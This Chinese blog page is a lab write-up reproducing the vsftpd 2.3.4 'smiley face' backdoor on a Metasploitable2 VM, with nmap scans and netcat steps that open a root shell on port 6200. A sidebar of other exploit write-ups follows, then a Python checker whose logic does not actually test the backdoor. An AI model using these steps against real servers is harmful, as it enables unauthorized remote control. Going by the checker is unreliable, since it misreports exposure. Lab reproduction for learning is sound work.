笑脸漏洞复现

最新推荐文章于 2025-04-22 00:15:00 发布
最新推荐文章于 2025-04-22 00:15:00 发布
阅读量545 收藏 7
点赞数 6
CC 4.0 BY-SA版权
文章标签: 安全 web安全 网络 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/csjjjd/article/details/143135292

FTP 笑脸漏洞(也称为 VSFTPD 2.3.4 后门漏洞)是一个著名的安全漏洞,影响了 vsftpd(非常安全的 FTP 守护进程)版本 2.3.4。此漏洞允许攻击者通过特殊的字符注入来启动后门,从而获得对受影响系统的远程控制。

漏洞原理

  1. 代码注入:

    • 漏洞的核心在于对用户输入的处理不当,攻击者可以在 FTP 服务的登录过程中输入特定的字符(如 :))来执行特定的代码。这种字符组合在某些情况下会被 FTP 服务解析为命令,而不是普通的字符。

  2. 后门功能:

    • 当攻击者通过 FTP 客户端连接到受影响的 vsftpd 服务器,并使用用户名 :) 登录时,vsftpd 会在内部执行一个特殊的处理流程,从而激活一个隐藏的后门。这个后门会在 6200 端口上监听,允许攻击者执行任意命令。

  3. 受影响的版本:

    • 该漏洞只存在于 vsftpd 2.3.4 版本中。后续版本(如 2.3.5 及以后的版本)已经修复了这个问题。

 漏洞复现

  1. 打开靶机:Metasplotable2-Linux 
  2. Nmap扫描同网断的靶机,观察靶机上的服务开放情况:

nmap 192.168.xx.0/24

 

找到了靶机的ip以及开放的端口。

3.接下来对靶机的服务及对应的版本进行扫描

 nmap -sV 192.168.xx.xx

 

发现vsftpd 2.3.4(即为笑脸漏洞对应的版本)

4.使用nc链接靶机21端口

nc 192.168.xx.xx 21   

输入user带有:),pass随便输入。
例如:user a:) pass 123456 

5。这一步过后端口已经打开

验证:

nmap -p 6200 192.168.xx.xx

发现靶机6200端口开启

直接远程链接一手

nc 192.168.xx.xx 6200

 链接成功!

 

补天阁
关注
CVE-2022-26923 ADCS权限提升漏洞
渗透之路,攻防之间皆学问
05-22 5176
CVE-2022-26923是一个影响微软Active Directory证书服务(AD CS)的权限提升漏洞
Dedecms 最新版漏洞收集并复现学习
墨痕诉清风的博客
09-30 5729
在用户密码重置功能处,php存在弱类型比较,导致如果用户没有设置密保问题的情况下可以绕过验证密保问题,直接修改密码(管理员账户默认不设置密保问题)。这么一次过滤,直接粗暴的将一些特殊字符替换为空,那么我们就可以通过特殊字符绕过上面的全局文件名不能包含php字符的限制,比如文件名为。这样,由于index.php中我们可以控制返回一个输入值和这个输入值经过服务器处理后的md5值。我们可以看到当uid存在值时就会进入我们现在的代码中,当cookie中的last_vid中不存在值为空时,就会将uid值赋予过去,
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 2840
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
漏洞复现】CVE-2024-38856(ApacheOfbiz RCE)
最新发布
blackpeach的博客
04-22 860
ApacheOfbiz RCE 漏洞复现,Groovy 表达式注入
FTP笑脸漏洞
liangtaiwei的博客
12-13 2173
利用nmap探测漏洞笑脸漏洞 nmap --script=vuln -p 21 192.168.1.133 这就是笑脸漏洞,当FTP认证时,如果用户名中包含:) 则会出发监听6200号端接口的连接的shell 此时用nmap -p 6200 192.168.10.133查看连接情况 进行nc 192.168.10.133连接后 然后连接6200端口 完成漏洞利用 ...
Nacos最新0day漏洞复现
qq_55213436的博客
07-16 4963
漏洞的核心在于 Nacos 的某些接口没有严格的权限控制,攻击者可以通过特制的请求向 Nacos 服务器发送恶意数据,从而执行任意代码。下载nacos代码搭建环境这次漏洞 需要登录到后才才能利用漏洞涉及到 Nacos 在处理反序列化数据时的缺陷,攻击者能够通过特定的 JSON 数据结构,远程执行恶意代码。以利用该漏洞读取敏感文件、执行系统命令。
VSFTPD2.3.4笑脸漏洞复现
m0_60466340的博客
12-11 1191
在vsftpd2.3.4版本中有一个后门 ,在检测到用户名带有特殊字符:)时,会自动打开6200端口。 复现过程: 用nmap扫面本网段内的主机,发现有打开21端口,用于传输ftp的主机 探测该主机的ftp服务器版本信息,可以看到该版本是存在笑脸漏洞的版本 用netcat连接该主机的21端口,输入带有:)的用户名,和随便一个password 这时候就是以root的权限登录了,可以通过netcat查看6200端口的用户信息 ...
Ftp笑脸漏洞复现(后门漏洞
qq_55857040的博客
12-13 6045
目录 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞 实验环境: 实验准备 实验过程 小总结 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的...
vsftpd 2.3.4 带漏洞版本 可复现
09-26
然而,每个软件都有可能存在安全隐患,而vsftpd 2.3.4版本就是一个典型的例子,它携带了一个名为“笑脸漏洞”(Smiling Goat Vulnerability)的安全问题。这个漏洞允许未经身份验证的远程攻击者执行任意代码,从而对...
HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现
Innocence_0的博客
10-28 262
最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。
网络安全必学渗透测试流程
qq_44005305的博客
02-12 719
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至优快云官方,朋友们如果需要可以点击这个链接免费领取。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。
2025年最新CVE-2022-10270漏洞复现
2303_78851087的博客
03-26 1083
2025年最新CVE-2022-10270漏洞复现
Ftp笑脸漏洞(VSFTPD 2.3.4)复现(后门漏洞
m0_62670778的博客
05-10 3541
使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4。nmap扫描端口6200,观察端口打开情况:已经开启。连接6200端口,成功以root身份登入。,连接靶机的21端口,输入user带有。选项是我们需要设置的,已经设置了,还需要设置。
Laravel 远程代码执行漏洞(CVE-2021-3129)复现
oiadkt的博客
04-24 6787
Laravel 远程代码执行漏洞(CVE-2021-3129)
CVE-2021-41773漏洞复现
Aquarius_ego的博客
03-24 1614
CVE-2021-41773漏洞复现
cve-2022-26134漏洞复现_实战_Confluence最新rce漏洞
恒安嘉新66的博客
06-11 3627
Confluence最新rce漏洞cve-2022-26134漏洞复现,有时拿下Confluence比拿下域控还有用,本次存在OGNL 注入rce漏洞,这次漏洞范围几乎通杀。
kaminsky 漏洞复现
weixin_48306934的博客
02-24 1160
0x00 写在前面 笔者实现主要参考0x04部分参考资料(1),该参考资料是笔者在做博客时找到的唯一一篇kaminsky的复现博客(大多数博主注重讲原理而不注重实现),实现过程写的还是比较详尽的,但由于原文将原理和实现过程割裂开来,一是使得kaminsky的实现过程与原理缺少对应性,使得读者尽管实现但是难以对应原理的理解;二是很多细节没有被强调,没有具体说明操作的原因和重点,导致笔者实际实现过程中出现了很多不必要的错误,笔者不希望更多学习kaminsky的学习者们在复现时再次浪费不必要的时间,甚至因为小细节
漏洞复现
03-08
### 关于漏洞复现安全测试与渗透测试 在安全测试和渗透测试领域,漏洞复现是指验证已知软件缺陷的过程。这不仅有助于理解特定漏洞的影响范围及其潜在危害,还能够帮助开发人员评估修复措施的有效性。 对于ZooKeeper未授权访问漏洞而言,在确保合法授权的前提下,可以通过设置一个实验环境来重现此问题[^1]。具体操作包括部署ZooKeeper实例而不配置任何身份验证机制,之后通过客户端工具连接至该服务并执行管理指令以证明缺乏适当权限控制的事实。 当涉及到Easy File Sharing Server (EFSS) 的案例时,则需先搭建含有易受攻击版本的服务端程序作为靶场的一部分;接着运用网络映射工具如Nmap识别开放端口和服务特征;最后编写或选用合适的exploit代码尝试远程触发系统调用——比如启动计算器应用以此展示成功获取了超出预期的操作能力[^2]。 至于VSFTPd中的“笑脸漏洞,可以参照公开资料准备相应的Python脚本来实施探测动作,并依据返回结果判断目标主机是否存在这一弱点。值得注意的是,此类活动应当严格限定在法律允许范围内以及获得充分许可的情况下开展[^3]。 ```python import socket def check_vulnerability(ip_address, port=21): payload = b'\x0D\x0AABOR \x0D\x0A' try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((ip_address, port)) response = s.recv(1024).decode() if '220' not in response[:3]: print("[+] FTP service detected but does not seem vulnerable.") return False s.sendall(payload) result = s.recv(1024) if "vsFTPd 2.3.4" in str(result): print(f"[!] Potential vulnerability found on {ip_address}:{port}") return True else: print("[+] No known vulnerabilities identified.") return False except Exception as e: print(f"[-] Error occurred during testing: {e}") return None if __name__ == "__main__": target_ip = input("Enter the IP address to test:") check_vulnerability(target_ip) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值